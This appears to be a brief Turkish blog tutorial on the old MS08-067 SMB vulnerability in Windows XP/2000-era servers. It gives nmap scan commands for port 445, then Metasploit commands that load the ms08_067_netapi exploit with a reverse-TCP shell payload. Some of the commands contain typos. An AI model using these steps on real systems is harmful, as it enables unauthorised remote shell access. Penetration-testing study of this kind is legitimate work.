27 Temmuz 2021 Salı

MS08-067 ZAFİYETİ VE SÖMÜRÜLMESİ



Genelde 2000li windows Serverlarda ve xp makinalarda bulunur.SMB üzerine yazılmış bir exploittir.


Bu zafiyeti tespit etmek için sistem üzerine bilindik bir nmap taraması yapabiliriz.Fakat ben size nmap scriptini kullanarak tarama yapmasını göstereceğim.


usr/share/nmap/scripts/


-ls | grap “ms08”


karşımıza çıkan scripti kopyalıyoruz ve


nmap –scripts script adı ip adresi -p445 ile(www.sechunterz.pw)sistemde tarama yaptırıyoruz ve zafiyetin olduğunu gözlemliyoruz.


daha sonra msfconsole’dan


use exploit/windows/smb/ms08_067_netapi


set rhost ile rhost u giriyoruz.


set payload windows/shell/reverse_tcp


set LHOST ile LHOST’u giriyoruz ve


run diyerek exploiti başlatıyoruz.

0 comments:

Yorum Gönder